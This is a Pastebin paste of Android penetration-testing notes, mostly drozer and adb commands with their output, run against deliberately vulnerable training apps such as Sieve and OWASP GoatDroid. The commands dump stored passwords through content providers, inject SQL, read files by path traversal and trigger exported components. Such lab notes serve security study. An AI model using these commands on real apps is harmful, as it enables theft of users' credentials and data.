API tools faq
paste
Guest User

Untitled

a guest
Dec 8th, 2017
385
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.05 KB | None | 0 0
raw download clone embed print report
  1. starting a drozer session
  2.  
  3. $ adb forward tcp:31415 tcp:31415
  4.  
  5. connecting a drozer
  6.  
  7. $ drozer console connect
  8.  
  9. Retrieving Package Information
  10.  
  11. dz> run app.package.list -f sieve
  12.  
  13. We can ask drozer to provide some basic information about the package using the `app.package.info` command
  14.  
  15. dz> run app.package.info -a com.mwr.example.sieve
  16.  
  17. Identify the Attack Surface
  18.  
  19. dz> run app.package.attacksurface com.mwr.example.sieve
  20.  
  21. Launching Activities
  22.  
  23. dz> run app.activity.info -a com.mwr.example.sieve
  24.  
  25. Package: com.mwr.example.sieve
  26. com.mwr.example.sieve.FileSelectActivity
  27. com.mwr.example.sieve.MainLoginActivity
  28. com.mwr.example.sieve.PWList
  29.  
  30. Since this activity is exported and does not require any permission, we can ask drozer to launch it:
  31.  
  32. dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
  33.  
  34.  
  35. Reading from Content Providers
  36.  
  37.  
  38. dz>run app.provider.info -a com.mwr.example.sieve
  39.  
  40. Database-backed Content Providers (Data Leakage)
  41.  
  42. drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs:
  43.  
  44. dz> run scanner.provider.finduris -a com.mwr.example.sieve
  45. Scanning com.mwr.example.sieve...
  46. Unable to Query content://com.mwr.example.sieve.DBContentProvider/ ...
  47. Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
  48. Accessible content URIs:
  49. content://com.mwr.example.sieve.DBContentProvider/Keys/
  50. content://com.mwr.example.sieve.DBContentProvider/Passwords
  51. content://com.mwr.example.sieve.DBContentProvider/Passwords/
  52.  
  53. We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database:
  54.  
  55. dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
  56. id: 1
  57. service: Email
  58. username: incognitoguy50
  59. password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded) email: incognitoguy50@gmail.com
  60.  
  61.  
  62. Database-backed Content Providers (SQL Injection)
  63.  
  64. dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
  65. dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  66.  
  67. Android returns a very verbose error message, showing the entire query that it tried to execute.
  68. We can fully exploit this vulnerability to list all tables in the database:
  69.  
  70. dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
  71. dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
  72.  
  73. File System-backed Content Providers
  74. dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  75.  
  76. to dump the db to local machine
  77.  
  78. dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data /data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  79.  
  80. Content Provider Vulnerabilities
  81. dz> run scanner.provider.injection -a com.mwr.example.sieve
  82. Scanning com.mwr.example.sieve...
  83. Injection in Projection:
  84. content://com.mwr.example.sieve.DBContentProvider/Keys/
  85. content://com.mwr.example.sieve.DBContentProvider/Passwords
  86. content://com.mwr.example.sieve.DBContentProvider/Passwords/
  87. Injection in Selection:
  88. content://com.mwr.example.sieve.DBContentProvider/Keys/
  89. content://com.mwr.example.sieve.DBContentProvider/Passwords
  90. content://com.mwr.example.sieve.DBContentProvider/Passwords/
  91.  
  92. to test LFI OR file path travesals Or reading local files via vulnerble content providers in the app
  93.  
  94. dz> run scanner.provider.traversal -a com.mwr.example.sieve
  95. Scanning com.mwr.example.sieve...
  96. Vulnerable Providers:
  97. content://com.mwr.example.sieve.FileBackupProvider/
  98. content://com.mwr.example.sieve.FileBackupProvider
  99.  
  100.  
  101. to read
  102. dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  103.  
  104. Interacting with Services
  105.  
  106. dz> run app.service.info -a com.mwr.example.sieve
  107.  
  108. Unintended Data Leakage
  109.  
  110.  
  111. pidcat
  112.  
  113. $ pidcat com.mwr.example.sieve
  114.  
  115. Insecure Data Storage
  116.  
  117. root@cancro:/data/data/com.jianguo.funcontrol/shared_prefs # ls -al
  118. ls -al
  119. -rw-rw---- u0_a216 u0_a216 124 2015-12-19 13:51 AGREE_PROTOCOL.xml
  120. -rw-rw---- u0_a216 u0_a216 799 2016-02-06 18:42 CoreServicePrefs.xml
  121. -rw-rw---- u0_a216 u0_a216 127 2016-01-31 17:09 WebViewChromiumPrefs.xml
  122. -rw-rw---- u0_a216 u0_a216 226 2016-02-06 17:09 com.iflytek.msc.xml
  123. -rw-rw---- u0_a216 u0_a216 133 2016-01-31 17:09 com.jianguo.funcontrol_preferences.xml
  124. -rw-rw---- u0_a216 u0_a216 72801 2016-02-06 17:09 moive.sp.xml
  125. -rw-rw---- u0_a216 u0_a216 942 2016-02-06 18:42 umeng_general_config.xml
  126.  
  127. root@cancro:/data/data/com.mwr.example.sieve # ls -al
  128. ls -al
  129. drwxrwx--x u0_a188 u0_a188 2015-08-03 20:51 cache
  130. drwxrwx--x u0_a188 u0_a188 2016-06-30 00:02 code_cache
  131. drwxrwx--x u0_a188 u0_a188 2014-08-01 22:32 databases
  132. lrwxrwxrwx root root 2016-06-29 22:36 lib -> /data/app-lib/com.mwr.example.sieve-1
  133.  
  134.  
  135. Insufficient Transport Layer Protection
  136.  
  137. Burp Suite
  138.  
  139. Unintended Data Leakage
  140. # String enetered: 123456
  141.  
  142. pidcat com.mwr.example.sieve
  143.  
  144. root@ubuntu:~# pidcat.py com.mwr.example.sieve
  145.  
  146. art I Late-enabling -Xcheck:jni
  147. BoostFramework V mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int
  148. [])
  149. V mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease()
  150. V mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTou
  151. ch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[])
  152. V mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,ja
  153. va.lang.String)
  154. V mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop()
  155. V BoostFramework() : mPerf = com.qualcomm.qti.Performance@817a13
  156. V BoostFramework() : mPerf = com.qualcomm.qti.Performance@804f450
  157. OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true
  158. Adreno-EGL I <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_L
  159. A.BF.1.1.3_RB1__release_AU (Ia10634f51b)
  160. I OpenGL ES Shader Compiler Version: E031.29.00.00
  161. I Build Date: 01/10/16 Sun
  162. I Local Branch: mybranch17687478
  163. I Remote Branch: quic/LA.BF.1.1.3_rb1.8
  164. I Local Patches: NONE
  165. I Reconstruct Branch: NOTHING
  166. OpenGLRenderer I Initialized EGL, version 1.4
  167. ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBCon
  168. tentProvider
  169. m_MainLogin D String enetered: 123456
  170. Timeline I Timeline: Activity_launch_request time:7110102
  171. BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f
  172.  
  173. Attacking Services
  174.  
  175. dz> run app.service.info --package org.owasp.goatdroid.fourgoats
  176. Package: org.owasp.goatdroid.fourgoats
  177. org.owasp.goatdroid.fourgoats.services.LocationService
  178. Permission: null
  179.  
  180. Attacking Activities
  181.  
  182. The components listed in the AndroidManifest.xml file
  183. dz> org.owasp.goatdroid.fourgoats -u
  184. Package: org.owasp.goatdroid.fourgoats
  185. Exported Activities:
  186. org.owasp.goatdroid.fourgoats.activities.Main
  187. org.owasp.goatdroid.fourgoats.activities.ViewCheckin
  188. org.owasp.goatdroid.fourgoats.activities.ViewProfile
  189. org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication
  190.  
  191. Activate the component
  192. dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.activities.ViewProfile
  193.  
  194. Attacking Broadcast Receivers
  195.  
  196.  
  197. dz> run app.broadcast.info --package org.owasp.goatdroid.fourgoats
  198. Package: org.owasp.goatdroid.fourgoats
  199. org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver
  200. Permission: null
  201.  
  202. If you would see in the AndroidManifest.xml file of FourGoats application then you will find action name is org.owasp.goatdroid.fourgoats.SOCIAL_SMS and component name as org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver . So we have to set these parameters in drozer accordingly.
  203.  
  204. dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234 --extra string message "it's test"
  205.  
  206. or directly use
  207.  
  208. adb shell
  209.  
  210.  
  211. am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 –es newpass qwreet@123!
  212.  
  213.  
  214. Exploiting Debuggable Applications
  215.  
  216. $ adb jdwp
  217. 347
  218. 602
  219. 710
  220. 724
  221. 737
  222. 811
  223. 929
  224. 1202
  225. 1320
  226. 1362
  227. 1383
  228. 1405
  229. 1931
  230. 2022
  231. 2207
  232. 2222
  233. 2239
  234. 2253
  235. 2269
  236. 2283
  237. 2310
  238.  
  239. $ adb shell ps | grep '1931'
  240. u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
  241.  
  242. C:\Users\syandava\Desktop\sieve\dist
  243. $ adb shell ps | grep sieve
  244. u0_a59 1320 177 570756 43612 ffffffff b769007b S com.mwr.example.sieve
  245. u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
  246.  
  247.  
  248. $ adb shell
  249. root@vbox86p:/ # run-as com.mwr.example.sieve
  250. run-as com.mwr.example.sieve
  251. root@vbox86p:/data/data/com.mwr.example.sieve $ ls -l
  252. ls -l
  253. drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 cache
  254. drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 databases
  255. lrwxrwxrwx install install 2017-12-05 22:42 lib -> /data/app-lib/com.mwr.example.sieve-1
  256. root@vbox86p:/data/data/com.mwr.example.sieve $ exit
  257. exit
  258. root@vbox86p:/ # exit
  259. exit
  260.  
  261. C:\Users\syandava\Desktop\sieve\dist
  262. $ adb shell run-as com.mwr.example.sieve /data/data/
  263. run-as: exec failed for /data/data/ Error:Permission denied
  264.  
  265.  
  266. And Some other ways
  267.  
  268. $ adb jdwp
  269.  
  270. Next we'll need to forward our debugging session to a port we can connect to with our debugger:
  271. $adb forward tcp:8000 jdwp:498
  272. Finally we can attach the debugger with:
  273. $jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!